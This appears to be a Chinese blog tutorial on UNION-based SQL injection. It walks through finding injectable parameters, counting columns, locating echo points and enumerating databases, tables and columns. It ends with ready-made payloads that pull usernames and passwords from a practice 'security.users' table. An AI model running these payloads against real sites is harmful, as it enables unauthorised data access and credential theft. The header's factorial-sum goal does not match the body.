🏆今日学习目标: 🍀学会阶乘之和题目 ✅创作者:贤鱼 🎉个人主页:贤鱼的个人主页 🔥专栏系列:网络安全 
- union注入
- 原理
- 过程
- 判断数字或者字符串
- 判断字段数
- 判断回显点
- 注入库名
- 注入表名
- 注入列名
- 查数据
利用union关键字,union会将前后两次查询结果拼在一起,由于是联合查询,必须保证字段数一致,也就是两个查询结果有相同列数
过程1 判断数字或者字符串注入类型 2 判断字段数,查询有几个字段 3 判断回显点,有些字段存在但是不会输出内容,我们需要找到会显示的字段数 4 注入库名 5 注入表名 6 注入列名 7 查数据
判断数字或者字符串输入: id=1 id=1’ id=1’–+(–+是注释的意思)
为什么加个单引号会报错,而加个注释又会查询成功呢? 举个栗子:‘xxx xxx xxx’这样子是正常的 ‘xxx xxx id’ xxx’ 这样子第二个’是不是就会报错 ‘xxx xxx id’–+xxx’这样子后面的‘就被注释掉了,也就不会报错了
判断字段数上文说过,union前后查询字段数必须一致,所以我们还要对字段数进行判断。在此可以利用order by n进行判断,意思是根据n个字段排序,如果不存在这个字段就会报错
这里依次查询1,2,3,4,5
4和5都会报错,所以可以得知,字段数为3 当然 union也是可以用的
第一个是1查询的,后面三个是1,2,3查询的,1,2,3,4依旧报错
这里的操作和上文union查询字段数一样
很明显,字段数3中,我们的1,2,3都输出了,所以回显点就是1,2,3
注入库名查询到回显点,就要开始注入了,想要注入数据,必须得到他的库名 获得库名可以用database()函数 如图:输入id=-1’ union select 1,2,3 --+
我们再回显点2位置注入,发现成功获得了库名
当然,换个位置效果一样 分享几个查询数据库的方法
id=-1' union select 1,database(),3 --+
查看所有数据库名称
id=-1' union select 1,SCHEMA_name,3 from information_schema.schemata --+
id=-1' union select 1,SCHEMA_name,3 from information_schema.schemata limit1,1 --+ # 查询第2个数据
也可以用group_concat()函数将查询结果内容放入同一行
id=-1' union select 1,group_concat(SCHEMA_name),3 from information_schema.schemata --+
有了库名就可以查询表名了
id=-1' union select 1,group_concat(table_name),3 from information_schema.tables
where table_schema='库名' --+
就可以查询到表名了
注入列名查询到库名和表名就可以查询列名
d=-1' union select 1,group_concat(column_name),group_concat(data_type) from
information_schema.columns where table_schema='库名' and table_name='表名' --+
接下来就是查询数据了
id=-1' union select 1,username,password from security.users limit 0,1 --+
id=-1' union select 1,concat(username,0x5c,password),3 from security.users limit 0,1 --+
id=-1' union select 1,group_concat(username,0x5c,password),3 from security.users
--+
concat() :将两个字段结合成为一个字段
🏆结束语union注入的大致流程就是这样了,有需要的话订阅一下专栏吧,持续更新的
